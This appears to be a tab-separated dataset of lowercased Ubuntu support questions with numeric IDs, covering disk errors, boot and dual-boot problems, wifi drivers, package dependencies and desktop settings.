scsi removable disk output of fsck sudo fsck -n /dev/sdb fsck from util-linux 2.20.1 e2fsck 1.42 ( 29-nov-2011 ) fsck.ext2 : device or resource busy while trying to open /dev/sdb filesystem mounted or opened exclusively by another program ? output of sudo fdisk -l /dev/sdb disk /dev/sdb1 : 16.0 gb , 16008593408 bytes 64 heads , 32 sectors/track , 15266 cylinders , total 31266784 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6f20736b this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdb1p1 ? 778135908 1919645538 570754815+ 72 unknown /dev/sdb1p2 ? 168689522 2104717761 968014120 65 novell netware 386 /dev/sdb1p3 ? 1869881465 3805909656 968014096 79 unknown /dev/sdb1p4 ? 2885681152 2885736650 27749+ d unknown partition table entries are not in disk order this is not yet fixed as i 've tried plenty of ways . any idea on how to fix this ?
409521	ubuntu 12.10 trying to download upgrades	not enough space : the upgrade needs a total of 50.8 m free space on disk '/boot ' . please free at least an additional 50.8 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . what do i do ?
409522	when i install `` metasploit-latest-linux-installer.run '' in ubuntu it getting error	i download metasploit-latest-linux-installer.run file from metasploit.com . i am use sudo chmod +x metasploit-latest-linux-installer.run then sudo ./metasploit-latest-linux-installer.run but it getting error . i dont understand what the problem was ? ? ? please help me .
409523	i literally do n't see the dmi option in the settings . not solved like the other questons	i have the option for headphones and for my laptop speakers but when plugged into hdmi , i do n't get the hdmi option . installing that sound thing that the comments suggested did n't work . probably because the driver does n't seem to support that aspect of the hdmi , but where does one get an updated hdmi driver for uuntu ? wolf @ ubuntu : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 03 )
409527	installation of groovenet results in `` trafic light-o error ''	i am following these instructions to install the groovenet simulator : to install qt3 type : sudo apt-get install qt3-dev-tools to install g++ : sudo apt-get install g++ navigate to your download folder and untar ( or unzip ) the package . you may use tar -xzvf 'file name' cd into your extracted folder - > project/src type : make clean make to build and install groovenet . i complete these steps to install groovenet , but it then shows this error : trafic light-o error
409528	how do i install the korean ( hangul ) keyboard on ubuntu 13.10 ?	i 've been looking around the internet for tutorials on how to add the korean keyboard . as of now , the only thing i 've done is i added the korean language in my region & language system settings . please help !
409530	how do i view a file strictly by the date it was accessed/created/downloaded	i am looking for a command that i can use to locate a file by the date a file was created on my computer
409534	create a sidebar window application that ca n't be obscured	when the unity launcher is visible and i maximize a window it does n't occupy that space . i want to duplicate that function for an application where i display a narrow window docked to the right of my screen ( unless you are a spreadsheet or movie buff , that 's what that extra horizontal space is good for ) . what do i need to do ( i know it 's a little blur , sorry for that ) to create a window that docks on the right side reduces the available space for maximized windows thx for all pointers
409535	command line tool file top : ftop ?	on rh-epel there is an useful tool ftop to see file top , io and which files are used . are there an alternative tools in ubuntu ? ?
409537	how to remove [ trafic light-o ] error 1 when installing groovenet	1 . first , make sure you have installed qt3 platform and g++ compiler . it works fine for g++ with 4.4.5 or above . ⠀• to install qt3 : ⠀⠀type 'sudo apt-get install qt3-dev-tools ' in the terminal ⠀• to install g++ : ⠀⠀type 'sudo apt-get install g++ ' in the terminal 2 . then please go to https : //github.com/mlab/groovenet 3 . please click 'download ' to download the groovenet simulator . 4 . navigate to your download folder and untar ( or unzip ) the package . you may use tar -xzvf 'file name' 5. cd into your extracted folder - > project/src 6. type 'make clean' 7. type 'make ' to build and install groovenet . 8 . if there are no errors , cd into bin folder 9. type './groovenet ' to run the simulator if there are no errors , after did these steps i got this error : [ trafic light-o ] error 1 how do i fix this error ?
409538	the following packages have unmet dependencies . i ca n't find solution	i try to install php5-fpm package but i have this information : the following packages have unmet dependencies : php5-fpm : depends : php5-common ( = 5.5.7+dfsg-1+sury.org~quantal+1 ) but 5.3.10-1ubuntu3 is to be installed e : unable to correct problems , you have held broken packages . here is full terminal output : root @ myserv /home/pw # sudo apt-get install php5-common reading package lists ... done building dependency tree reading state information ... done php5-common is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 43 not upgraded . and : root @ myserv /home/pw # sudo apt-get install php5-fpm -- fix-missing -- fix-broken reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5-fpm : depends : php5-common ( = 5.5.7+dfsg-1+sury.org~quantal+1 ) but 5.3.10-1ubuntu3 is to be installed e : unable to correct problems , you have held broken packages . how to fix it ? i use : ubuntu server 12.10
409541	save the terminal history to a file for print	my ubuntu headless server is about to lose both hard drives ( raid1 ) . i already saved the most important stuff . now i 'm sitting in front of a mac os x client with the terminal open ( ssh ) . i need to save the whole or at least the most important install commands i wrote . so basically the first 1k commands ... i would like to print that & save it to a file . so i can easily reinstall everything . by the way , also save some hard researched config files that i do n't remember where they are .
409545	files not desktop ubuntu 13.10	files and folders no longer appear on my desktop ubuntu 13.10 . i have tried updates and synaptic packages manager reinstall
409546	mate fails to follow profiles	i 'm having an issue with the mate desktop . i installed it about 2 weeks ago , and there were seemingly no errors . it installed all of the required packages just fine and the desktop itself starts , and works , as intended . the problem i 'm having deals with power settings . when i close the lid of my laptop , the default action is to put the computer into suspension . however , because suspension takes a while for my computer to go into , as well as halts any network interactions ( since i have to download some files overnight ) , i would prefer the computer do nothing when the lid closes . i went into mate 's native power settings and set it to `` dim screen '' when the laptop lid is closed and the computer is connected to ac power . unfortunately , it ignores this setting and goes into suspension if the lid is closed . the other problem with profiles i 'm having has to do with the screensaver setting . mate will start the screensaver i want , and wo n't prompt me for my password on wake up , as i set , but it goes to the screensaver every 5 minutes , despite me having set it to every 10 minutes . there does n't seem to be a conflict between the power settings and the screensaver settings , and the screensaver will initialize right after the screen dims . but it 's far too early . i find myself having to move the mouse or press a key 5 minutes into a youtube video . as you may expect , not very pleasing . does anyone know why mate fails to follow the profiles set , and how to fix the problems ? thanks !
409549	what is the role of lock files in a system ?	i can see there are many lock file here and there in my system . what is the exact role and purpose of those lock files ? in my system i got this list , /run/lock/whoopsie/lock /proc/sys/dev/cdrom/lock /var/lib/dpkg/lock /var/lib/apt/lists/lock /var/cache/apt/archives/lock
409554	i do not have a `` desktop '' after dual boot of ubuntu 13.10 on a hp pavilion with windows 8.1	i did a dual boot of ubuntu 13.10 on my hp computer with windows 8.1 preinstalled . however , after the installation , when i boot the ubuntu , i am only directed to the pront . where is the desktop. ? ? ? ? ? i have a hp pavilion 17 notebook pc ( processor : amd a4-5000 apu with radeon ( tm ) hd graphics 1.50ghz ; ram : 8,00gb ; x64 ) . this is what i did ... i mainly followed the steps from : ( http : //www.everydaylinuxuser.com/2013/09/install-ubuntu-linux-alongside-windows.html ) . i first shrunk the windows partition to get a free volume of 465,5gb . i turned off fast boot and disabled both the legacy support and the secure boot options . i thereafter rebooted the computer using a bootable usb thumb drive , with the 64-bit 13.10 ubuntu version . however , when i selected `` install ubuntu '' on the grub screen , i did not the ubuntu gui ... .i only got a black screen ... this i solved by redo the reboot , but before i hit `` install '' in the grub menu , i pressed `` e '' in order to edit the script . before `` quiet splash '' , i included `` acpi_osi=linux acpi_backlight=vendor '' . this time , i was greeted by a window that said `` your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . ok '' . when i clicked `` ok '' , i had four options , but none worked ... still a black screen . now , i tried to fix the graphic card issue by following the suggestion from ( ubuntu 13.10 low graphics error ) . according to this help , i had the this error because of a conflict between graphic mode . you have to only use one graphic mode , `` lightdm '' or `` gdm '' . after rebooting again ( and same error message ) , i pressed ( alt+ctr+f1 ) to log in virtual terminal . in that terminal i typed in my login name and password and typed `` sudo apt-get install gdm '' . after the installation i got a window showing the graphic mode . i selected `` gdm '' and typed `` sudo reboot '' . finally , i could now see the ubuntu installation gui . in this , i selected the `` something else '' -option to get the partitioning window . in this , i selected the unpartitioned space ( `` free space '' , 488094mb ) , clicked on the `` + '' symbol and created a logical partition ( the partition mounted to `` / '' , size set to 50gb , and the partition type set to ext4 ) . i did a second logical partition on the remaining free space minus 16gb ( =438076mb ) . this time mounted to `` /home '' and type set to ext4 . i created a third partition in the remaining free space ( 16,7gb ) and choose swap as the type . i used the `` dev/sda ada_wdc_wd10jpvx-60j ( 1,0tb '' to choose where to install the bootloader . i was then able to finnish the installation . however , after the installation , when i boot the ubuntu , i am only directed to the pront . where is the desktop. ? ? ? ? ?
409555	what does `do-release-upgrade` really do ?	we know that do-release-upgrade âdoes a release upgradeâ . but at a little lower level what does it really do ? i plan to do a more manual upgrade , for instance the debian way : aptitude update and aptitude full-upgrade after setting up the sources . actually , i plan to do it entirely interactive with aptitude . but that leaves me curious about what else do-relase-upgrade does , except hosing up my sources.list .
409557	executable files , office , mathematical equations	i am student of software engineering , so for those purposes , i need some software to run it . i have to create c++ programs and i have got a development environment . but do n't know where and how will i run executable files of .exe in terminal , as i use to run them through command prompt . second thing is that , which software will be use to run in place of word and excel ? for mathematical subjects , i use mathtype , will this software work ? and if not , then what can i use to type mathematical equations , like fractions , squareroots , derivatives etc . and which software can be use to create flow charts and graphs ?
409561	partitions created in windows are not showing in ubuntu	i want to install ubuntu 12.10 64 bit alongside windows 8 , so i created some free space in windows 8 . when i try to install ubuntu using a live usb , the free space created is not visible and the partitions shown are completely different . but when i click the option `` try ubuntu '' , i am able to use my windows partitions .
409562	unable to find gimp after installation through software center	i installed gimp through the ubuntu software center and the software center says it 's installed , but it does n't appear in the dash and i ca n't find a way to start it . i tried connecting to the gimp website and tried to sign in/create an account & it wo n't remember my password , thus i ca n't log in . when i ask for a new password it says its sending me an new one in and email that never arrives . i just do n't understand what 's going on . is there another way to run this program ?
409563	folder containing media automatically closes	i have 2 folders that contain music and videos respectively.the videos were all downloaded using the youtube add-on to firefox 1 or 2 of the files in my folders cause nautilus to close or crash . is there a quick way to find out what the problem file is ? i suspect that ubuntu opens the file during the file listing routine in order to preview it for easy viewing that is causing the crash , but i 'm not 100 % certain on that . much apreciated armien
409567	php session_start ( ) does not stop loading page	i 'm running ubuntu and apache2 . in a test.php script i 've created , i use the session_start ( ) function and the page does not seem to stop loading ( behaves as if it is running in an infinite loop ) . it has worked in the past ( 2 days ago ) and i have not changed any environmental variables ( that i 'm aware of ) . can someone help me or point me in the right direction please ? if more information is required , please ask , and i 'll reply as soon as possible . thanks - btw i 'm a noob so excuse the noob question - thanks
409569	running a process on startup	sorry if this is a bit of a basic question , i 'm fairly inexperienced with ubuntu and linux in general . i am looking to upgrade an application server from jboss eap 5 to jboss eap 6 , previously we have sent out customers instructions to run jboss eap 5 on startup so i 'm looking to do the same for jboss eap 6 . i 've got it to work in one way , by adding the following line to /etc/rc.local : sh /opt/jboss-eap-6.1/bin/domain.sh although from what i 've read this is n't really a recommended approach . from what i can understand the approach we used for jboss 5 involved putting a symbolic link into the run level initialisation directories ( /etc/rc2.d/ for example ) that referenced another script in /etc/init.d to start the service . i 've tried this for jboss 6.1 , and although if i manually start the process up with `` sh /etc/rc2.d/s01jboss6.1 '' , jboss starts to run , this process does not run of it 's own accord on startup . i believe i 'm correct in thinking ubuntu starts up in run level 2 so is it not the case that this script in /etc/rc2.d/ should run when the os is booted ? thanks .
409573	apt-get install -- reinstall -- install-recommends not installing a recommended package	with either one of the following commands , i expect python-omniorb-omg to be installed , which did n't get so however . the package is a recommended package according to python-omniorb description in raring . $ sudo apt-get install -- reinstall python-omniorb $ sudo apt-get install -- reinstall -- install-recommends python-omniorb i purged python-omniorb and ran the simplest command like below , then the recommended package got installed . although $ sudo apt-get install python-omniorb am i missing something wrong here with -- reinstall option ? ( i 'm not sure how python-omniorb got previously installed while one of its recommended packages was n't installed ) .
409574	ubuntu boot failed	i have kubuntu 13.04 installed and it was working fine until today , it 's failed to boot with mounting failed message . i 've run the boot repair but did n't fix my problem . if anyone can help , that would be much appreciated . thanks !
409577	gnupg with gpa & seahorse	i recently installed the gnupg guis on ubuntu , gpa & seahorse . upon launching gpa the key list is populated with some keys already for what look like german companies . when i launch seahorse there are no keys listed at all . i wanted to check whether anyone else has installed the gpa from the repositories and found this too . does gpa not look at the keys stored by gpg , or does it come preloaded with some keys ? if it does look at keys from gpg , why has seahorse not seen these keys too ? i 've tried to look for similar issues by web search but have found nothing so far . thank you ubuntu community j
409582	connected to wifi , but no internet on ubuntu 12.04	my new dell xps 13 haswell developer edition ( with ubuntu 12.04 ) began to have problems with the wifi . everything worked just fine till yesyerday when i connected my computer to wifi at work ( it worked just fine ) and come back home and connected to the usual wifi . it seemed connected , but the internet did n't work . i have tryied a lot of solutions proposed on this site as , modifying the ilwifi.conf file by adding the command : options iwlwifi 11n_disable=1 . it works just fine using the cable , and not at all usin wifi . i have installed wicd and the interface tells me that there are no wireless network found . i have also desactivated the proxy in mozilla , but still no success . i have also reinstalled the drivers for my wifi card , and again , no success . here are the results of some commands when the cable is not connected , that can be helpful : cris @ christi : ~ $ iwconfig lo no wireless extensions . wlan0 no wireless extensions . cris @ christi : ~ $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1344 errors:0 dropped:0 overruns:0 frame:0 tx packets:1344 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:129867 ( 129.8 kb ) tx bytes:129867 ( 129.8 kb ) wlan0 link encap : ethernet hwaddr 5c:51:4f : ed:4e:73 inet addr:192.168.1.52 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :5e51:4fff : feed:4e73/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:596 errors:0 dropped:0 overruns:0 frame:0 tx packets:549 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:135170 ( 135.1 kb ) tx bytes:97869 ( 97.8 kb ) cris @ christi : ~ $ nm-tool networkmanager tool state : connected ( global ) - device : wlan0 [ sfr_80f0 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : connected default : no hw address : 5c:51:4f : ed:4e:73 capabilities : speed : 1 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) ... ... ipv4 settings : address : 192.168.1.52 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 cris @ christi : ~ $ sudo lshw -c network [ sudo ] password for cris : pci ( sysfs ) *-network description : ethernet interface product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 6b serial : 5c:51:4f : ed:4e:73 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical configuration : broadcast=yes driver=iwlwifi driverversion=3.5.0-45-generic firmware=22.0.6.0 ip=192.168.1.52 latency=0 link=yes multicast=yes resources : irq:60 memory : f0400000-f0401fff jan 23 10:04:12 christi networkmanager [ 1074 ] : < info > address 192.168.1.52 jan 23 10:04:12 christi networkmanager [ 1074 ] : < info > prefix 24 ( 255.255.255.0 ) jan 23 10:04:12 christi networkmanager [ 1074 ] : < info > gateway 192.168.1.1 jan 23 10:04:12 christi networkmanager [ 1074 ] : < info > hostname 'christi' jan 23 10:04:12 christi networkmanager [ 1074 ] : < info > nameserver '192.168.1.1' jan 23 10:04:12 christi networkmanager [ 1074 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... jan 23 10:04:12 christi networkmanager [ 1074 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) started ... jan 23 10:04:13 christi networkmanager [ 1074 ] : < info > ( wlan0 ) : writing resolv.conf to /sbin/resolvconf jan 23 10:04:13 christi networkmanager [ 1074 ] : < info > ( wlan0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] jan 23 10:04:13 christi networkmanager [ 1074 ] : < info > activation ( wlan0 ) successful , device activated . jan 23 10:04:13 christi networkmanager [ 1074 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) complete . jan 23 10:04:13 christi networkmanager [ 1074 ] : < info > wpa_supplicant die count reset jan 23 10:04:32 christi networkmanager [ 1074 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . jan 23 10:04:32 christi networkmanager [ 1074 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... jan 23 10:04:32 christi networkmanager [ 1074 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... jan 23 10:04:32 christi networkmanager [ 1074 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . cris @ christi : ~ $ dmesg | grep wlan | tail -n20 [ 921.672554 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 921.724628 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 930.114041 ] wlan0 : authenticate with 30:7e : cb : a1:80 : f4 [ 930.114910 ] wlan0 : send auth to 30:7e : cb : a1:80 : f4 ( try 1/3 ) [ 930.118894 ] wlan0 : authenticated [ 930.119243 ] wlan0 : associate with 30:7e : cb : a1:80 : f4 ( try 1/3 ) [ 930.123517 ] wlan0 : rx assocresp from 30:7e : cb : a1:80 : f4 ( capab=0x411 status=0 aid=2 ) [ 930.124285 ] wlan0 : associated [ 930.124801 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 1101.164462 ] wlan0 : deauthenticating from 30:7e : cb : a1:80 : f4 by local choice ( reason=3 ) [ 1101.196490 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1101.488712 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1101.548956 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1109.942962 ] wlan0 : authenticate with 30:7e : cb : a1:80 : f4 [ 1109.943982 ] wlan0 : send auth to 30:7e : cb : a1:80 : f4 ( try 1/3 ) [ 1109.945787 ] wlan0 : authenticated [ 1109.949796 ] wlan0 : associate with 30:7e : cb : a1:80 : f4 ( try 1/3 ) [ 1109.952544 ] wlan0 : rx assocresp from 30:7e : cb : a1:80 : f4 ( capab=0x411 status=0 aid=2 ) [ 1109.953463 ] wlan0 : associated [ 1109.955262 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready can anybody help me with this ? thank you the result of dmesg | grep firmware is : [ 2.950585 ] iwlwifi 0000:02:00.0 : loaded firmware version 22.0.6.0 op_mode iwlmvm [ 3.002968 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 3.119174 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 3863.176879 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 3863.312469 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 16997.271422 ] warning : at /build/buildd/linux-lts-quantal-3.5.0/drivers/base/firmware_class.c:597 request_firmware+0xb5/0xf0 ( ) [ 16997.271471 ] [ < ffffffff81439f95 > ] request_firmware+0xb5/0xf0 [ 16997.271515 ] bluetooth hci0 : firmware : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq will not be loaded [ 16997.271517 ] bluetooth : hci0 failed to open intel firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq ( -11 ) [ 16997.271522 ] warning : at /build/buildd/linux-lts-quantal-3.5.0/drivers/base/firmware_class.c:597 request_firmware+0xb5/0xf0 ( ) [ 16997.271564 ] [ < ffffffff81439f95 > ] request_firmware+0xb5/0xf0 [ 16997.271600 ] bluetooth hci0 : firmware : intel/ibt-hw-37.7.bseq will not be loaded [ 35380.715329 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 35380.849609 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 59731.794863 ] warning : at /build/buildd/linux-lts-quantal-3.5.0/drivers/base/firmware_class.c:597 request_firmware+0xb5/0xf0 ( ) [ 59731.794914 ] [ < ffffffff81439f95 > ] request_firmware+0xb5/0xf0 [ 59731.794961 ] bluetooth hci0 : firmware : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq will not be loaded [ 59731.794962 ] bluetooth : hci0 failed to open intel firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq ( -11 ) [ 59731.794967 ] warning : at /build/buildd/linux-lts-quantal-3.5.0/drivers/base/firmware_class.c:597 request_firmware+0xb5/0xf0 ( ) [ 59731.795011 ] [ < ffffffff81439f95 > ] request_firmware+0xb5/0xf0 [ 59731.795047 ] bluetooth hci0 : firmware : intel/ibt-hw-37.7.bseq will not be loaded [ 59742.687217 ] warning : at /build/buildd/linux-lts-quantal-3.5.0/drivers/base/firmware_class.c:597 request_firmware+0xb5/0xf0 ( ) [ 59742.687278 ] [ < ffffffff81439f95 > ] request_firmware+0xb5/0xf0 [ 59742.687324 ] bluetooth hci0 : firmware : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq will not be loaded [ 59742.687326 ] bluetooth : hci0 failed to open intel firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq ( -11 ) [ 59742.687331 ] warning : at /build/buildd/linux-lts-quantal-3.5.0/drivers/base/firmware_class.c:597 request_firmware+0xb5/0xf0 ( ) [ 59742.687374 ] [ < ffffffff81439f95 > ] request_firmware+0xb5/0xf0 [ 59742.687410 ] bluetooth hci0 : firmware : intel/ibt-hw-37.7.bseq will not be loaded i also call dell support for more information and they made me change the channel for the access point to wifi from automatic to 11 , because they said it 's more compatible with their wifi card . now it 's working . but sometimes it becomes really slow . on the other hand , when i connect it to wifi at work it works great . dmesg | grep firmware command result : dmesg | grep iwl [ 2.836895 ] iwlwifi 0000:02:00.0 : irq 60 for msi/msi-x [ 3.143750 ] iwlwifi 0000:02:00.0 : request for firmware file 'iwlwifi-7260-7.ucode ' failed . [ 3.143769 ] iwlwifi 0000:02:00.0 : no suitable firmware found ! [ 206.231931 ] iwlwifi 0000:02:00.0 : irq 60 for msi/msi-x [ 206.234528 ] iwlwifi 0000:02:00.0 : request for firmware file 'iwlwifi-7260-7.ucode ' failed . [ 206.234533 ] iwlwifi 0000:02:00.0 : no suitable firmware found ! [ 416.621741 ] iwlwifi 0000:02:00.0 : irq 60 for msi/msi-x [ 416.625783 ] iwlwifi 0000:02:00.0 : loaded firmware version 22.1.7.0 op_mode iwlmvm [ 416.636008 ] iwlwifi 0000:02:00.0 : detected intel ( r ) dual band wireless ac 7260 , rev=0x144 [ 416.636132 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s [ 416.636342 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s [ 416.844538 ] ieee80211 phy0 : selected rate control algorithm 'iwl-mvm-rs' [ 416.857390 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s [ 416.857596 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s cris @ christi : /lib/firmware $ dmesg | grep firmware [ 3.143750 ] iwlwifi 0000:02:00.0 : request for firmware file 'iwlwifi-7260-7.ucode ' failed . [ 3.143769 ] iwlwifi 0000:02:00.0 : no suitable firmware found ! [ 206.234528 ] iwlwifi 0000:02:00.0 : request for firmware file 'iwlwifi-7260-7.ucode ' failed . [ 206.234533 ] iwlwifi 0000:02:00.0 : no suitable firmware found ! [ 416.625783 ] iwlwifi 0000:02:00.0 : loaded firmware version 22.1.7.0 op_mode iwlmvm
409584	upgrading ubuntu 12.04 32 bit to 64 bit	i have recently installed ubuntu 12.04 lts i686.i want upgrade it to 64 bit.how can i do it via terminal ?
409586	i use outlook.com ; how do i synchronize my tasks , contacts , and calendar with evolution ?	i 'm looking to achieve parity between my nokia lumia and my pc , if possible . let me know what details i should be adding .
409587	dual boot windows 8.1 acer v3-571g with ubuntu 13.10	i am trying to dual boot my acer which came with windows 8 pre-installed . i tried using the tutorial here doing it the simple way but when i load ubuntu from my transcended flash drive it says that there is no other operating system installed . i tried partitioning my hard drive but i seem to have 3 recovery partitions and even though i have 485gb free i can only allocate 100gb to the new partition . i would like to have most of my hard drive allocated to ubuntu and just use the windows for programs like microsoft office .
409589	do the aticonfig -- set-powerstate and aticonfig -- lsp options no longer exist ?	when i try either of these options i get aticonfig : unrecognized option ' -- lsp' aticonfig : parsing the command-line failed . does the latest fglrx driver not make use of these power setting options any longer ? in which case how is low power setting configured on the card now ? it seems fglrx still installs the script /etc/acpi/fglrx-powermode.sh and in that script there are calls such as /usr/bin/aticonfig -- set-powerstate= $ powermode -- effective=now '' which one can see are intended to set low power setting whenever the events laptop lid closed , or ac disconnect occur ( see /etc/acpi/events/fglrx-ac-aticonfig and /etc/acpi/events/fglrx-lid-aticonfig ) , but these calls are going to do nothing at all without aticonfig having the -- set-powerstate option . on top of all this i noticed that /etc/init.d/atieventd is not starting the atieventsd on startup , and i traced this to the fact the daemonpath=/usr/sbin/atieventsd was looking for the daemon is sbin when it actually exists in regular old bin . is this all intentional , have these methods of controlling power been superseded ?
409590	installation ubuntu in text mode	how to install ubuntu 13.10 in text mode ? alternate iso is discontinued : p
409592	does not work booting my computer	i am a student of computer.i have a problem with my computer i bought a laptop from asus has a windows8.i wanted to install ubuntu alongside os windows8 . but let me install ubuntu . after i enter the bios and removed after i left ufi install ubuntu . after install add now ubuntu can not arrange usb , dvd boot.help me start hard drive . anyone know how i can rule is problem . anyone has any solution ? ! thank you very much !
409597	install package to specified directory , e.g , some where under /home	i do not want packages to be installed under / . ( sudo apt-get install ... ) . the reason why i need to do this is that : my '/ ' is mounted with my ssd ( 16gb ) and my hard disk ( 500gb ) is mounted at '/home ' . i have already installed my ubuntu 12.04 on that ssd . there is not much free space under '/ ' now .
409598	how to sync a data from windows app to cloud within wine ?	i am using xin inventory which is a very nice inventory management windows application . i bought it a couple of years back and i use it to manage around 600 products . xin inventory is only thing which is stopping me from completely migrating to linux . now in ubuntu i know i can use the app with the help of wine but is there any way within wine by which i can sync xin inventory data over cloud . on windows i simply installed xin inventory in dropbox folder and that let me access the data from all my computers , which is pretty convenient . i wanted same in ubuntu . kindly suggest me the best possible way of achieving this . thanks & regards
409599	how to reduce the command line prefix length in bash	how to reduce the command line prefix length ( i.e folder name or path in bash ) ? for example : venu @ venupc : ~ $ cd documents/code/new/ venu @ venupc : ~/documents/code/new $ i want to display present folder name new instead of complete path ( venu @ venupc : new $ ) .
409603	battery issue in asus with ubuntu 12.04	i have an asus n550jv-c232h , and i have installed ubuntu 12.04 lts and my laptop ca n't charge anymore . it 's a new one . i had previously lubuntu ( for 2 or 3 days before installing ubuntu ) , and i did n't have this problem . now although the system recognises that is connected to ac power , it does not charge any longer . can anyone help me with this ? thanks in advance
409604	how to play pacman in terminal ?	is there some cli software or script for running pacman in terminal ? . it is helpful i am looking for just-simple-pacman without huge graphics or somthing that used lot of resources through wine .
409607	how to create a customized ubuntu server iso ?	i 'd like to create a customized ubuntu server 12.04 iso but could n't find a clear approach on how to do it . i see that ubuntu-builder is a very good app to create a customized ubuntu desktop , but what about ubuntu server ?
409609	can not install into target mounted with noexec or nodev while doing qemu-deboot strapping	i 'm trying to install the armel version of ubuntu with qemu-deboot-strap on my desktop x64 system , but i 've found this error : $ mkdir precise $ sudo qemu-debootstrap -- arch=armel precise ./precise/ i : running command : $ debootstrap -- arch armel -- foreign precise ./precise/ /usr/sbin/debootstrap : 1280 : /usr/sbin/debootstrap : can not create /media/ziomario/nexus-10/images/313/precise/test-dev-null : permission denied e : can not install into target '/media/ziomario/nexus-10/images/313/precise ' mounted with noexec or nodev do you know how to fix it ? my system is like this : linux ziomario-macmini 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 x86_64 x86_64 x86_64 gnu/linux and this is the content of the /etc/fstab file : < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 / was on /dev/sda5 during installation uuid=c703f96e-42fd-4734-b622-15ba1dd5fc21 / ext4 errors=remount-ro 0 1 swap was on /dev/sda6 during installation uuid=1c2b872f-3be3-4c6c-b021-6cec3e8b77e2 none swap sw 0 0 thanks .
409611	desktop notification when long running commands complete	i 'd like to have a desktop notification whenever a command that has run for more than , say 15 seconds , finishes . in other words , i would like all commands to be wrapped in something like this start= $ ( date + % s ) ; original_command ; [ $ ( ( $ ( date + % s ) - start ) ) -le 15 ] || notify-send `` long running command finished '' what 's the best way to accomplish this in bash ?
409615	how to install php imap for php5-fpm ?	i 'm trying to install vtiger crm on ubuntu . this require imap . how to install php imap for php5-fpm ?
409617	what is the difference between socat and agetty ?	i am trying to setup virtio-serial to communicate between a virtual machine and its host . for this , i am following the instructions given here : using virtio serial to communicate i understand that there is a port on the host at tmp/foo on the host which is exposed as a special character device at /dev/hvc0 on the guest . the instruction manual asks to use socat on the host and agetty on the guest to spawn the console ports . however , on using agetty , i do not get any console port , whereas , on using socat on the guest as well , i can communicate with the host . i would like to know what are the primary differences between socat and agetty and whether this is the correct way to use socat , considering /dev/hvc0 is a special character device . i have given a look at the manual pages of both and would like a detailed description .
409621	ca n't boot after successful installation of 12.10	i have installed ubuntu 12.10 , alongside windows 7 , from an image dvd . installation goes successful and asks to restart the system . and after clicking ok it boots windows 7 . there is no trace of earlier ubuntu installation . i have tried and re-tried the installation process , that lasts for couple of hours . i have tried the boot-repair process by booting using 'try ubuntu without installing' but even that gives me an error `` please close all your package managers then try again '' even though there is nothing running alongside . here is the additional info .
